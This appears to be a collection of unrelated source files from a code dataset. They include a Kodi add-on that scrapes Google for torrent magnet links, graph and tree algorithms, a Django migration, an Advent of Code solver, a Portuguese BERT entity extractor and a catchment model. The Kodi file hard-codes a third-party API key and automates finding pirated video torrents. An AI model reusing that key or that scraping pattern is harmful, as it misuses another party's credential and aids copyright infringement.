xx.OpenURL(\"http://api.themoviedb.org/3/search/tv?api_key=bd6af17904b638d482df1a924f1eabb4&language=en&query=\"+quote_plus(url))\r\n\tentries=json.loads(link)\r\n\t#ST(entries)\r\n\t#mmm = mg.get_tvshow_details(title=\"\",tmdb_id=url, ignore_cache=MUcache, lang=MUlang)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\tprogress.close()\r\n\tfor entry in entries['results']:\r\n\t\t#ST(entry)\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmmm = mg.get_tvshow_details(title=\"\",tmdb_id=str(entry[\"id\"]), ignore_cache=MUcache, lang=MUlang)\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(mmm[-1][\"TVShowTitle\"], mmm[-1][\"tmdb_id\"], \"trakt.Shows\", isFolder=True, dados={'meta': mmm[-1]})\r\n\t\texcept:\r\n\t\t\tpass\r\n#-----------------------------------------\r\ndef BuscaFilmesPre():\r\n\tq = xbmcgui.Dialog().input(\"Se quiser colocar o ano faça dessa forma: Titanic, 1997\")\r\n\t#q = \"Mortal Kombat, 2021\"\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaFilmes&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t#q = \"Mortal Kombat\"\r\ndef BuscaFilmes():\r\n\tyearre = re.compile(\", (\\d{4})$\").findall(url)\r\n\tquery = quote_plus(re.sub(', (\\d{4})$', '', url))\r\n\tif yearre:\r\n\t\tyear=\"&year=\"+yearre[0]\r\n\telse:\r\n\t\tyear=\"\"\r\n\tST(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tentries=json.loads(link)\r\n\tprogress = 
xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\ttrak = xx.traktM()\r\n\tfor entry in entries['results']:\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmm = mg.get_tmdb_details(tmdb_id=str(entry['id']), imdb_id=\"\", tvdb_id=\"\", title=\"\", year=\"\", media_type=\"movies\", preftype=\"\", manual_select=False, ignore_cache=False, lang=MUlangM)\r\n\t\t\tpc = 1 if str(mm[\"tmdb_id\"]) in trak else None\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(\"\", str(entry['id']), \"tmdb.Opcoes\", isFolder=False, IsPlayable=True, dados={'mmeta': mm, 'pc': pc})\r\n\t\texcept:\r\n\t\t\tpass\r\n\tprogress.close()\r\n\txx.AddDir(url+\" Dublado 1080p\", quote_plus(url+\" Dublado 1080p\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" x265\", quote_plus(url+\" x265\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" YTS\", quote_plus(url+\" YTS\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url, quote_plus(url), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n#-----------------------------------------\r\ndef BuscaCat():\r\n\ttry:\r\n\t\tgoogle = xx.OpenURL(\"https://www.google.com/search?q=\"+url+\"+torrent\")\r\n\t\tgooglere = re.compile(\";url=([^\\\"]+)\\&ved\\=\").findall(google)\r\n\t\tprogress = xbmcgui.DialogProgress()\r\n\t\tprogress.create('Carregando...')\r\n\t\tprogress.update(0, \"Carregando...\")\r\n\t\tprog = 1\r\n\t\t#ST(googlere)\r\n\t\tfor links in googlere[:5]:\r\n\t\t\tif (progress.iscanceled()): break\r\n\t\t\tmagnet = xx.OpenURL(links)\r\n\t\t\tmagnetre = re.compile('magnet\\:\\?[^\\'|\"]+').findall(magnet)\r\n\t\t\tfor link in magnetre:\r\n\t\t\t\ttitle = re.compile(\"dn=(.+?)(\\&|$)\").findall(link)\r\n\t\t\t\tif title:\r\n\t\t\t\t\tj = PeerSeed(link)\r\n\t\t\t\t\tif \"seeds\" in j:\r\n\t\t\t\t\t\txx.AddDir(str(j[\"seeds\"])+\" / \"+str(j[\"peers\"])+\" \"+unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\txx.AddDir(unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\tprogtotal = int(100*prog/5)\r\n\t\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\t\tprog+=1\r\n\t\tprogress.close()\r\n\texcept:\r\n\t\txx.AddDir(\"Erro no servidor\", \"\", \"\", iconimage, info=\"\", isFolder=False, IsPlayable=True)\r\n#----------------------------------------\r\ndef ST(x=\"\", o=\"w\"):\r\n\tif o == \"1\":\r\n\t\to = \"a+\"\r\n\tif type(x) == type({}) or type(x) == type([]):\r\n\t\ty = json.dumps(x, indent=4, ensure_ascii=True)\r\n\telse:\r\n\t\ty = str(str(x).encode(\"utf-8\"))\r\n\tPath = xbmc.translatePath( xbmcaddon.Addon().getAddonInfo('path') )\r\n\tpy = os.path.join( Path, \"study.txt\")\r\n\t#file = open(py, \"a+\")\r\n\tfile = open(py, 
o)\r\n\tfile.write(y+\"\\n\"+str(type(x)))\r\n\tfile.close()","repo_name":"D4anielCB/plugin.video.CubeTor","sub_path":"resources/lib/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70093216807","text":"\"\"\"!\nPath in a given graph\n\"\"\"\n\nimport math\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\nfrom uuid import uuid4\n\nfrom pygmodels.gmodel.path import Path\nfrom pygmodels.graphf.bgraphops import BaseGraphOps\nfrom pygmodels.graphf.graphsearcher import BaseGraphSearcher\nfrom pygmodels.gtype.abstractobj import AbstractTree\nfrom pygmodels.gtype.basegraph import BaseGraph\nfrom pygmodels.gtype.edge import Edge, EdgeType\nfrom pygmodels.gtype.node import Node\nfrom pygmodels.gtype.queue import PriorityQueue\n\n\nclass Tree(BaseGraph, AbstractTree):\n \"\"\"!\n Ordered Tree object\n \"\"\"\n\n def __init__(self, gid: str, data={}, edges: Set[Edge] = None):\n \"\"\"\"\"\"\n nodes = None\n if edges is not None:\n nodes = set()\n for e in edges:\n estart = e.start()\n eend = e.end()\n nodes.add(estart)\n nodes.add(eend)\n super().__init__(gid=gid, data=data, nodes=nodes, edges=edges)\n self.__root = None\n es = [e.type() for e in self.E]\n if es[0] == EdgeType.DIRECTED:\n\n def egen(x):\n return BaseGraphOps.outgoing_edges_of(self, x)\n\n else:\n\n def egen(x):\n return BaseGraphOps.edges_of(self, x)\n\n self.paths: Dict[\n str, Union[dict, set]\n ] = BaseGraphSearcher.breadth_first_search(\n self, n1=self.root, edge_generator=egen\n )\n self.topsort = self.paths.top_sort\n self.bfs_tree = self.paths.tree[self.root.id()]\n\n @classmethod\n def from_node_tuples(cls, ntpls: Set[Tuple[Node, Node, EdgeType]]):\n \"\"\"\"\"\"\n edges: Set[Edge] = set()\n\n for e in ntpls:\n child = e[0]\n parent = e[1]\n edge = Edge(\n edge_id=str(uuid4()),\n start_node=parent,\n end_node=child,\n edge_type=e[2],\n )\n edges.add(edge)\n return Tree(gid=str(uuid4()), edges=edges)\n\n @classmethod\n def from_edgeset(cls, eset: Set[Edge]):\n \"\"\"\"\"\"\n return Tree(gid=str(uuid4()), edges=eset)\n\n def node_table(self):\n \"\"\"\"\"\"\n node_table = {\n v.id(): {\"child\": False, \"parent\": False} for v in self.V\n }\n for e in self.E:\n estart_id = e.start().id()\n eend_id = e.end().id()\n node_table[estart_id][\"parent\"] = True\n node_table[eend_id][\"child\"] = True\n #\n return node_table\n\n def get_root(self):\n \"\"\"\"\"\"\n node_table = self.node_table()\n root_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is False and v[\"parent\"] is True\n ]\n V = {v.id(): v for v in self.V}\n return V[root_ids[0]]\n\n def leaves(self) -> Set[Node]:\n \"\"\"\"\"\"\n node_table = self.node_table()\n #\n leave_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is True and v[\"parent\"] is False\n ]\n return set([v for v in self.V if v.id() in leave_ids])\n\n @property\n def root(self) -> Node:\n \"\"\"\"\"\"\n if self.__root is None:\n self.__root = self.get_root()\n return self.__root\n\n def height_of(self, n: Node) -> int:\n \"\"\"!\"\"\"\n if not BaseGraphOps.is_in(self, n):\n raise ValueError(\"node not in tree\")\n nid = n.id()\n return self.topsort[nid]\n\n def _is_closure_of(\n self, x: Node, y: Node, fn: Callable[[int, int], bool]\n ) -> bool:\n \"\"\"\"\"\"\n xheight = self.height_of(x)\n yheight = self.height_of(y)\n f = fn(xheight, yheight)\n print(f)\n print(x)\n print(y)\n return f\n\n def 
is_upclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x upclosure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight >= xheight\n\n def is_downclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x down closure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight <= xheight\n\n def upset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_upclosure_of)\n\n def downset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_downclosure_of)\n\n def is_set_of(\n self, n: Node, fn: Callable[[Node, Node], bool]\n ) -> Set[Node]:\n nodes = BaseGraphOps.nodes(self)\n nset = set([y for y in nodes if fn(n, y) is True])\n return nset\n\n def less_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) <= self.height_of(second)\n\n def greater_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) >= self.height_of(second)\n\n def nodes_per_level(self, level: int) -> Set[Node]:\n \"\"\"!\n extract nodes of certain level in tree\n \"\"\"\n return set(\n [n for n in BaseGraphOps.nodes(self) if self.height_of(n) == level]\n )\n\n def extract_path(\n self,\n start: Node,\n end: Node,\n filter_fn: Callable[[Set[Edge], str], Set[Edge]] = lambda es, n: set(\n [e for e in es if e.start().id() == n]\n ),\n costfn: Callable[[Edge, float], float] = lambda x, y: y + 1.0,\n is_min=True,\n ):\n \"\"\"\"\"\"\n if (\n BaseGraphOps.is_in(self, start) is False\n or BaseGraphOps.is_in(self, end) is False\n ):\n raise ValueError(\"start or end node is not inside tree\")\n #\n upset = self.upset_of(start)\n if end not in upset:\n raise ValueError(\"end node is not in upset of start.\")\n downset = self.downset_of(end)\n upset_edges = set()\n for u in upset:\n for e in BaseGraphOps.outgoing_edges_of(self, u):\n upset_edges.add(e)\n downset_edges = set()\n for d in downset:\n for e in BaseGraphOps.outgoing_edges_of(self, d):\n downset_edges.add(e)\n problem_set = upset_edges.intersection(downset_edges)\n ucs_path = Path.from_ucs(\n g=self,\n goal=end,\n start=start,\n filter_fn=filter_fn,\n costfn=costfn,\n is_min=is_min,\n problem_set=problem_set,\n )\n return ucs_path\n\n @classmethod\n def find_mst_prim(\n cls, g: BaseGraph, edge_generator: Callable[[Node], Set[Node]]\n ) -> AbstractTree:\n \"\"\"!\n Find minimum spanning tree as per Prim's algorithm\n Even and Guy Even 2012, p. 32\n \"\"\"\n l_e = 1 # length of an edge\n l_vs = {}\n vs = []\n eps = {}\n\n for v in g.V:\n l_vs[v] = math.inf\n vs.append(v)\n #\n s = vs[0]\n l_vs[s] = 0\n eps[s] = set()\n TEMP = vs.copy()\n T: Set[Edge] = set()\n while TEMP:\n minv = None\n minl = math.inf\n for v in TEMP:\n if l_vs[v] < minl:\n minl = l_vs[v]\n minv = v\n TEMP = [v for v in TEMP if v != minv]\n if minv is None:\n raise ValueError(\n \"Min vertex is not found. 
Graph is probably not connected\"\n )\n T = T.union(eps[minv])\n for edge in edge_generator(g.V[minv]):\n unode = edge.get_other(g.V[minv])\n u = unode.id()\n if u in TEMP and l_vs[u] > l_e:\n l_vs[u] = l_e\n eps[u] = set([edge])\n return cls.from_edgeset(eset=T)\n\n @classmethod\n def find_mnmx_st(\n cls,\n g: BaseGraph,\n edge_generator: Callable[[Node], Set[Edge]],\n weight_function: Callable[[Edge], float] = lambda x: 1,\n is_min: bool = True,\n ) -> Tuple[AbstractTree, List[Edge]]:\n \"\"\"!\n a modified version of kruskal minimum spanning tree adapted for\n finding minimum and maximum weighted spanning tree of a graph\n\n from Even and Guy Even 2012, p. 42\n \"\"\"\n queue = PriorityQueue(is_min=is_min)\n T: Set[Edge] = set()\n clusters = {v.id(): set([v]) for v in g.V}\n L: List[Edge] = []\n for edge in g.E:\n queue.insert(weight_function(edge), edge)\n #\n while len(queue) > 0:\n edge = None\n if is_min is True:\n k, edge = queue.min()\n else:\n k, edge = queue.max()\n #\n u = edge.start().id()\n v = edge.end().id()\n vset = clusters[v]\n uset = clusters[u]\n if vset != uset:\n T.add(edge)\n L.append(edge)\n clusters[v] = vset.union(uset)\n clusters[u] = vset.union(uset)\n return cls.from_edgeset(eset=T), L\n\n #\n def assign_num(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n counter: int,\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n counter += 1\n num[v] = counter\n visited[v] = True\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n cond = visited.get(u)\n if cond is None or cond is False:\n parent[u] = v\n self.assign_num(\n u,\n num=num,\n generative_fn=generative_fn,\n visited=visited,\n parent=parent,\n counter=counter,\n )\n\n #\n def check_ap(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n low: Dict[str, int],\n counter: int,\n aset: Set[str],\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n low[v] = num[v]\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n if num[u] >= num[v]:\n self.check_ap(\n v=u,\n num=num,\n visited=visited,\n parent=parent,\n low=low,\n counter=counter,\n generative_fn=generative_fn,\n aset=aset,\n )\n if low[u] >= num[v]:\n aset.add(v)\n #\n low[v] = min(low[v], low[u])\n elif parent[v] != u:\n low[v] = min(low[v], num[u])\n\n def find_separating_vertices(\n self, generative_fn: Callable[[Node], Set[Node]]\n ) -> Set[Node]:\n \"\"\"!\n find separating vertices of graph\n as in Erciyes 2018, p. 
230, algorithm 8.3\n \"\"\"\n num: Dict[str, float] = {n: math.inf for n in self.V}\n low: Dict[str, float] = {n: math.inf for n in self.V}\n visited: Dict[str, bool] = {}\n parent: Dict[str, str] = {n: \"\" for n in self.V}\n aset: Set[str] = set()\n\n counter = 1\n v = [node for node in self.V][0]\n self.assign_num(\n v=v,\n num=num,\n visited=visited,\n parent=parent,\n counter=counter,\n generative_fn=generative_fn,\n )\n self.check_ap(\n v=v,\n num=num,\n visited=visited,\n generative_fn=generative_fn,\n parent=parent,\n low=low,\n counter=counter,\n aset=aset,\n )\n return set([self.V[a] for a in aset])\n","repo_name":"D-K-E/graphical-models","sub_path":"pygmodels/gmodel/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":12106,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"34716471510","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport oilserver.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('oilserver', '0010_auto_20160404_2138'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='testcase',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcase.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testcaseclass',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcaseclass.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testframework',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this test framework and version.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n ]\n","repo_name":"autonomouse/dashboard","sub_path":"weebl/oilserver/migrations/0011_auto_20160404_2139.py","file_name":"0011_auto_20160404_2139.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21751456946","text":"from . import computer\n\n\ndef part1():\n \"\"\"\n The software draws tiles to the screen with output instructions:\n every three output instructions specify the x position (distance from the left), y position (distance from the top), and tile id.\n\n 0 is an empty tile. No game object appears in this tile.\n 1 is a wall tile. Walls are indestructible barriers.\n 2 is a block tile. Blocks can be broken by the ball.\n 3 is a horizontal paddle tile. The paddle is indestructible.\n 4 is a ball tile. 
The ball moves diagonally and bounces off objects.\n\n How many block tiles are on the screen when the game exits?\n \"\"\"\n program = read_input()\n output_values = []\n computer.run_program(program, [], output_values)\n blocks = output_values[2::3].count(2)\n print(blocks)\n\n\ndef part2():\n \"\"\"\n Memory address 0 represents the number of quarters that have been inserted; set it to 2 to play for free.\n The arcade cabinet has a joystick that can move left and right.\n If the joystick is in the neutral position, provide 0.\n If the joystick is tilted to the left, provide -1.\n If the joystick is tilted to the right, provide 1.\n When three output instructions specify X=-1, Y=0, the third output instruction is the new score.\n What is your score after the last block is broken?\n \"\"\"\n program = read_input()\n program[0] = 2\n input_values = []\n arcade = computer.get_computer(program, input_values)\n score = 0\n ball_x = 0\n paddle_x = 0\n while True:\n x = next(arcade)\n if type(x) == list: # When the game is finished and the program halts, the computer outputs the program state\n break\n y = next(arcade)\n v = next(arcade)\n if v == 3:\n paddle_x = x\n elif v == 4: # Every tick, the last value to be updated is that of the ball\n ball_x = x\n next_input = 0\n if ball_x < paddle_x:\n next_input = -1\n elif ball_x > paddle_x:\n next_input = 1\n input_values.append(next_input)\n if x == -1:\n score = v\n print(score)\n\n\ndef read_input():\n with open('input/day13.txt') as input_file:\n return [int(x) for x in input_file.readline().split(',')]\n","repo_name":"Metamess/AdventOfCode","sub_path":"2019/days/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3221607259","text":"from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n'''\nCitação de projeto utilizado: https://github.com/neuralmind-ai/portuguese-bert\n@InProceedings{souza2020bertimbau,\n author=\"Souza, F{\\'a}bio and Nogueira, Rodrigo and Lotufo, Roberto\",\n editor=\"Cerri, Ricardo and Prati, Ronaldo C.\",\n title=\"BERTimbau: Pretrained BERT Models for Brazilian Portuguese\",\n booktitle=\"Intelligent Systems\",\n year=\"2020\",\n publisher=\"Springer International Publishing\",\n address=\"Cham\",\n pages=\"403--417\",\n isbn=\"978-3-030-61377-8\"\n}\n'''\n\nfrom transformers import BertForTokenClassification, DistilBertTokenizerFast, pipeline\n\nmodel = BertForTokenClassification.from_pretrained('pierreguillou/ner-bert-large-cased-pt-lenerbr')\ntokenizer = DistilBertTokenizerFast.from_pretrained('pierreguillou/bert-large-cased-pt-lenerbr'\n , model_max_length=512\n , do_lower_case=False\n )\nnlp = pipeline('ner', model=model, tokenizer=tokenizer, grouped_entities=True)\n\ndef find_people(id:str, text:str) -> list:\n\n result = nlp(str(text).replace('- ', ''))\n names = []\n lastIndex = 0\n\n for item in result:\n if item['entity_group'] == \"PESSOA\":\n if \"#\" in item['word'] and names != []:\n name = names[lastIndex]['content']\n name += item['word']\n names[lastIndex]['content'] = name.replace(\"#\", '')\n names[lastIndex]['end_offset'] = item['end']\n else:\n names.append({\n 'excerpt_id': 
id,\n 'content': item['word'],\n 'start_offset': item['start'],\n 'end_offset': 0,\n 'entity_type': 'PERSON'\n })\n lastIndex = len(names) - 1\n \n #if names != []:\n #print(names)\n return names\n\n### FOR TESTS PURPOSE ONLY ###\n\ndef execute_csv(file):\n \n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n names = find_people(row['excerpt_id'], row['excerpt'])\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(names) > 0:\n for name in names:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"","repo_name":"MLRG-CEFET-RJ/qdrec","sub_path":"scripts/bert_ner_processor.py","file_name":"bert_ner_processor.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11817378517","text":"# -*- coding: utf-8 -*-\nimport os, io, re, subprocess, copy, graphviz as gv, pandas as pd, matplotlib.pyplot as plt, numpy as np\nfrom scipy.interpolate import griddata\nfrom matplotlib.cm import ScalarMappable\nfrom matplotlib.colors import Normalize\n\nos.environ['PATH']=os.environ['PATH']+\";C:\\\\Program Files (x86)\\\\Graphviz2.38\\\\bin\"\n\nclass Catchment(object):\n \"\"\"\n Class for catchment implemented as a linked list\n \"\"\"\n def __init__(self):\n self.reaches = {}\n self.canStart = {}\n self.canBeCleaned = {}\n self.failed = {}\n self.nReachDone = 0\n self.ouletReaches = []\n self.inletReaches = []\n \n def addReach(self,ID, reachData, hydrologyMassLoadingsFileBase):\n \"\"\"\n Adds a reach to the catchment. \n \"\"\"\n self.reaches[ID] = Reach(ID, reachData, hydrologyMassLoadingsFileBase, self.signalStatusChange)\n\n def finalize(self):\n \"\"\"\n Finalize the catchment after all reaches have been added.\n Sets the links between the reaches.\n \"\"\"\n self.nReach = len(self.reaches)\n\n # The Directed Acyclic Graph specifying the watershed topology\n # A dict with for each reach a tuple with the downstream reaches\n self.directedGraph = {}\n\n for reach in self: # for every reach...\n for dId in list(reach.downstreamRef): # loop through downstream reaches\n if not dId in self.reaches.keys():\n # remove downstream reach if it is not in the catchment (e.g. 
if catchment is cropped)\n del(reach.downstreamRef[dId])\n reach.downstreamIDs.remove(dId)\n else:\n downstreamReach = self.reaches[dId]\n reach.set_downstreamRef(downstreamReach) # set reference to downstream reaches for this reach\n downstreamReach.set_upstreamRef(reach) # set upstream refence to this reach for downstream reaches\n downstreamReach.upstreamIDs.append(reach.ID)\n self.directedGraph[reach.ID] = (dId,)\n \n for reach in self:\n # determine the inlet and outlet reaches\n if len(reach.downstreamIDs)==0:\n self.ouletReaches.append(reach)\n if len(reach.upstreamIDs)==0:\n self.inletReaches.append(reach)\n\n # set the current status of the reaches and whether or not they have loading from upstream\n # checkstatus() and set_hasUpstreamLoading() propagate downward in the catchment so looping\n # over inlet reaches is sufficient\n for reach in self.inletReaches:\n reach.checkStatus()\n reach.set_hasUpstreamLoading()\n \n for reach in self:\n # set flag indicating whether mass outflow (MFU) file is Needed\n reach.set_massOutflowFileNeeded()\n\n \n def __iter__(self):\n \"\"\"\n Returns iterator over reaches\n \"\"\"\n return(iter(self.reaches.values()))\n\n @property\n def reachIDs(self):\n \"\"\"\n Returns list of reach IDs\n \"\"\"\n return(list(self.reaches.keys()))\n\n def __getitem__(self,ID):\n \"\"\"\n Returns reach for specified ID. ID may be a dict key, a index, or a slice\n \"\"\"\n if isinstance(ID, int):\n return(list(self.reaches.values())[ID])\n elif isinstance(ID,slice):\n return(list(self.reaches.values())[ID])\n else:\n return(self.reaches[ID])\n\n def __getattr__(self,name):\n \"\"\"\n Returns a dict for all reaches with reachIDs as keys and attribute \n name as values. If an attribute accessed that is not a member of Catchment, this\n function is called. 
This allows reach attribute prop to be accessed as\n catchment.prop, provided that prop is not an attribute of catchement.\n \"\"\"\n return({reach.ID: getattr(reach,name) for reach in self})\n\n def signalStatusChange(self,reach):\n \"\"\"\n Called by reaches to inform the catchment object of a status change.\n This is used to maintain a list of reaches that can start.\n \"\"\"\n if reach.stat == Reach.flagCanStart:\n self.canStart[reach.ID] = reach\n elif reach.stat == Reach.flagRunning:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n elif reach.stat == Reach.flagCanBeCleaned:\n self.canBeCleaned[reach.ID] = reach\n elif reach.stat == Reach.flagCleaning:\n del self.canBeCleaned[reach.ID]\n elif reach.stat == Reach.flagDone:\n self.nReachDone += 1\n elif reach.stat in [Reach.flagError, Reach.flagUpstreamError]:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n self.failed[reach.ID] = reach\n\n @property\n def canStartReaches(self):\n return([reach for reach in self.canStart.values()])\n\n @property\n def canBeCleanedReaches(self):\n return([reach for reach in self.canBeCleaned.values()])\n\n @property\n def failedList(self):\n return self.failed\n\n def getReachProp(self, prop, reachIds = None):\n \"\"\"\n Returns reach property for all, or a selection of reaches\n \"\"\"\n return([reach.getProperty(prop) for reach in self])\n\n @property\n def isDone(self):\n return self.nReachDone==len(self.reaches)\n\n def catchmentMap(self, colorVals = None, valRange = [0,1], fileName = None, title = None, linewidth = 5):\n withnames = False\n #create figure object and color map\n fig = plt.figure(figsize=(12,12))\n ax = fig.add_subplot(111)#, projection=\"3d\")\n ax.set_xlabel(\"X [m]\")\n ax.set_ylabel(\"Y [m]\")\n ax.grid(True)\n \n if type(colorVals) == list:\n cmap = ScalarMappable(cmap='jet',norm = Normalize(valRange[0],valRange[1]))\n cmap.set_array(valRange)\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n cmap = None\n colorVals = [colorVals]*len(self.reaches)\n colorFcn = lambda x: colorVals[0]\n \n # plot reaches\n for index, reach in enumerate(self): \n for downstream_reach in reach.downstreamRefs:\n ax.plot([reach.x,downstream_reach.x],[reach.y,downstream_reach.y],color=colorFcn(colorVals[index]), linewidth = linewidth) \n if withnames:\n x_coord = (reach.x+downstream_reach.x)/2. \n y_coord = (reach.y+downstream_reach.y)/2. 
\n ax.text(x_coord,y_coord,reach.key, verticalalignment='bottom', horizontalalignment='right',\n color=fontcolor, fontsize=fontsize, \n bbox=dict(facecolor=color_waterbody, edgecolor='None', boxstyle='round,pad=.2',alpha=.5))\n \n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n if not cmap is None: \n cbar = plt.colorbar(cmap, ax = ax)\n cbar.ax.tick_params(labelsize=15) \n if not title is None: plt.title(title,fontsize=18)\n if not fileName is None:\n plt.savefig(os.path.join(fileName))\n plt.close()\n\n \n def catchmentGraph(self, colorVals = None, colorMap = 'jet', range = [0,1], format = 'pdf', fileName = 'graph'):\n # Makes a graph of the reaches and their connections with graphviz.\n dot = gv.Digraph(engine= 'dot')\n dot.attr('graph', nodesep='1',ranksep = '0.005', margin = '0')\n dot.attr('node', margin = '0',fixedsize = 'false', fontsize = '6',width = '0.1',\n height = '0.05', shape = 'box', style = 'filled', penwidth = '0.0')\n dot.attr('edge', arrowsize = '0.2', penwidth = '0.25')\n\n if not colorVals is None:\n cmap = ScalarMappable(cmap=colorMap,norm = Normalize(range[0],range[1]))\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n colorFcn = lambda x: None\n colorVals = [0]*self.nReach\n \n for idx, reach in enumerate(self):\n dot.node(reach.ID,label = reach.ID, fillcolor = colorFcn(colorVals[idx])) # add node/reach\n if len(reach.downstreamRef)>0: # add connections to down stream\n 